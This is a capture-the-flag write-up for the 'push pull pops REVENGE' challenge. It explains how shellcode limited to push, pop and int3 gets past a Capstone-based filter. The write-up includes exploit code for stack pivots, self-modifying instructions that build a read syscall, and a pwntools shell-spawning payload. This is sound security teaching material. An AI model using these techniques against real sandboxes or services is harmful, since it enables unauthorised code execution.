push pull pops REVENGE

by s1gn3rs

Points: 476 (Dynamic)

Solves: 20

Description:

you aint getting away with it , not on my watch .

Author: buddurid

Given: to_give.zip

TL;DR

We are presented with a Python script that receives our payload and translates it to x86-64 instructions. It will crash if it receives instructions different than int3, pop [register] or push [register], otherwise it executes our payload.
By doing two stack pivots, altering our shellcode mid-run, crafting our instructions to execute a read syscall, and building new shellcode that spawns a shell.

Python script analysis

Code analysis (source code provided)

def main():
    code = input("Shellcode : ")
    code = base64.b64decode(code.encode())
    try:
        if check(code):
            run(code)
        else:
            raise AssertionError("check failed")
    except Exception as e:
        print("Exception type :", type(e)) 
        print("Exception text :", e)       
        
        exit(1)

We have a main() that receives our payload. It expects it to be encoded in base64 and then, with check(code), evaluates if our payload is acceptable. If so, it runs our payload as shellcode. Otherwise, if our payload doesn’t pass the check it will raise an AssertionError("check failed").

def check(code: bytes):
    if len(code) > 0x2000:
        return False

    md = Cs(CS_ARCH_X86, CS_MODE_64)
    md.detail = True
    code_len=len(code)
    decoded=0
    for insn in md.disasm(code, 0):
        name = insn.insn_name()
        decoded+=insn.size
        if name!="pop" and name!="push" :
            if name=="int3" :
                continue
            return False
        if insn.operands[0].type!=CS_OP_REG:
            return False
    if code_len!=decoded:
        print("nice try")
        return False
        
    return True

The first thing done in check(code) is to verify that our payload does not exceed 0x2000 bytes. Next, it disassembles our input using Capstone in x86-64 mode with md.detail = True, in order to inspect operands. Those instructions can only be an int3, pop or push instructions, and due to code line if insn.operands[0].type!=CS_OP_REG the operands of pop and push can only be registers (so no push/pop immediate is allowed). Finally, it checks whether the length of the original payload corresponds to the length of the disassembled instructions. This is a mitigation of a previous challenge “push pull pops”, a very similar challenge but without this condition. That version allowed inserting an invalid byte that would stop the disassembler, letting us write other instructions than int3/pop/push. But now, due to this condition, we can’t do that, meaning we need to build a shellcode exploit purely with those three instructions.

def run(code: bytes):
    # Allocate executable memory using mmap
    mem = mmap.mmap(-1, len(code), prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
    mem.write(code)
    
    # Create function pointer and execute
    func = ctypes.CFUNCTYPE(ctypes.c_void_p)(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
    func()
    
    exit(1)

The last one is run(code), and as the name suggests runs our assembly code, maps a memory region with full permissions, read, write and execute, writes our code to that memory and executes it.

Exploit

Auxiliary Functions

def push(reg):
    return asm(f'push {reg}')

def pop(reg):
    return asm(f'pop {reg}')

int3 = asm('int3')

Exploit path

Pivot stack to the heap in order to find a useful instruction.
Pivot stack to mapped memory to alter our shellcode.
Craft a read syscall to the mapped memory and create new instructions.
execve to change process and gain control.

Where we are in the process

By sending just an int3 and using GDB, we can inspect our surroundings.

alt text

Finding a useful value

Note: for now, let’s assume that we can use this value as an instruction to execute.

This was one of the hardest parts, finding a useful instruction (preferably an add [register], [register]). After a while I came to the conclusion that stack didn’t have this kind of instruction for us to use. (Important: we can’t rely on instructions from pointers since they change at each run, so we need to search for values that stay at the same relative offset and that stay with the same value independent of the run). So I started searching inside the heap since Python makes a really extensive use of it. After some time I found this value:

alt text

Though far from perfect, it was something, requiring rcx and rax to be valid pointers.

Stack pivot

As we can see in the previous stack image, we have two useful pointers, one at [rbp + 0x70] pointing to the beginning of our mapped memory, and another at [rbp + 0x78] pointing to the heap. Even though we have more of these pointers to the heap, this was the closest one to the address of the value found previously.

partialPayload = pop("rcx") * 16 +  pop("rsp")

With this, we store the mapped memory pointer in rcx and perform a stack pivot to the heap.

offsetToAddDwordRcxEdx = 0x420
amountPops = offsetToAddDwordRcxEdx // 8
partialPayload  = pop("r15") * 4 + pop("r13")
partialPayload += pop("r15") * (amountPops + 1 - 5)
partialPayload += push("rcx") + pop("rsp") # r13 = 0xa0, r15 = 0x1101 DWORD PTR [rcx],edx

While reaching the found value we popped r13 in order to store 0xa0, this will be helpful to reduce the number of additions in order to create the syscall instruction. By the end we have r15 = 0x1101 and r13 = 0xa0, we can now do another stack pivot to the mapped memory.

Constructing pop and mov instructions

Even though we can use pop and push, since we want to write a new code with more instructions we need to write these pops and pushes in a location different than the one currently being executed, so we need to create these instructions too. Right now we have rsp pointing to our mapped memory region so we can get our required instructions by doing simple sequential pops and pushes. At first thought, we could use just one and have the other bytes set to zero. But it happens that the bytes b"\x00\x00" translate to instruction add BYTE PTR[rax], al and we may not have a valid pointer in rax when executing those instructions. So we start our payload by creating these pops and pushes trying not to mess with the current state of registers.

payloadStart =  push("rcx") * 8 + pop("rcx") * 8 # just trash
payloadStart += push("rsi") * 8 # need to restore rsi at the end
payloadStart += push("rsi") * 8 + pop("rsi") * 8 # push("rsi") and pop("rsi") 8 times
payloadStart += push("rcx") * 4 + pop("rsi") * 4 # push("rcx") and pop("rsi") 4 times
payloadStart += push("rdx") * 8 + pop("rdx") * 8 # push("rdx") and pop("rdx") 8 times
payloadStart += push("rdi") * 8 + pop("rdi") * 8 # push("rdi") and pop("rdi") 8 times
payloadStart += push("rdi") * 4 + pop("rax") * 4 # push("rdi")  and pop("rax") 4 times
payloadStart += push("rdx") * 8 # need to restore rdx at the end
payloadStart += (push("r13") + pop("rdx")) * 2 + push("rdx") + pop("rdx") # ( push("r13") and pop("rdx") ) 2 times + push("rdx") and pop("rdx") once
payloadStart += pop("rdx") * 8 # restoring rdx at the end
payloadStart += pop("rsi") * 8 # restoring rsi at the end

Store new instructions

We use registers to store the new instructions.

partialPayload = pop("r9") * 4 + pop("r10") # r9 = push("rsi") * 8
partialPayload += pop("r10") # r10 = push("rcx") * 4 + pop("rsi") * 4
partialPayload += pop("r14") + pop("r12") # r14 = 8 * push("rdx") ; r12 = pop("rdx") * 8
partialPayload += pop("r8") + pop("rax") # r8 = push("rdi") * 8
partialPayload += pop("rbx") # rbx = push("rdi")*4 + pop("rax") * 4
partialPayload += pop("rbp") * 2 # rbp = [push("r13") + pop("rdx")] * 2 + push("rdx") + pop("rdx")
partialPayload += push("rdx") + pop("rax") # to have a pointer in rax
# r13 = 0xa0
# r15 = DWORD PTR [rcx], edx ; (add BYTE PTR[rax], al) * 3

Constructing syscall

Here we have a catch, we need to make rsp go further enough to not mess with the current rip but then, when constructing our syscall, due to the way the stack works we need to build our new shellcode from top to bottom.

# payload += push("rdx") # to align rip when using int3
partialPayload = pop("rcx") * 0x100 +  push("rsp") + pop("rcx") # address to write new instruction

# mov rdx, r13 -> rdx = 0xa0
partialPayload += push("rbp") # [push("r13") + pop("rdx")] * 2 + push("rdx") + pop("rdx") 

# address (top of stack) to write our new shellcode
partialPayload += push("r10") # push("rcx") * 4 + pop("rsi") * 4

# mov rax, rdi  -> rax = 0 (syscall read number)
partialPayload += push("rbx") # push("rdi") * 4 + pop(rax) * 4

# ----- Now this is setting registers and creating syscall
partialPayload += push("r13") + pop("rdx") # rdx = 0xa0

# this creates the syscall instruction, rcx = address to put SYSCALL
partialPayload += push("r14") # 8 pushes of add    DWORD PTR [rcx],edx
partialPayload += push("r15") * 15
partialPayload += push("r12")  # 8 pops of rdx
partialPayload += push("r9") # 8 pushes of rsi
partialPayload += push("r15") * 8 # 24 pushes of add    DWORD PTR [rcx],edx

Final shellcode

Now that we are writing again to the mapped memory we just need to craft shellcode that pops a shell.

payload = b64encode(payload).decode()
P.sendlineafter(b"Shellcode : ", payload.encode())

# Now the real shellcode to get the flag
shellcode = asm(shellcraft.amd64.linux.sh())

shellcode = b"\x90" * 8 + asm("mov rbp, rsp") + shellcode
P.send(shellcode)

Exploit Code

exploit.py

Flag

Securinets{friendhsip_with_capstone_ended}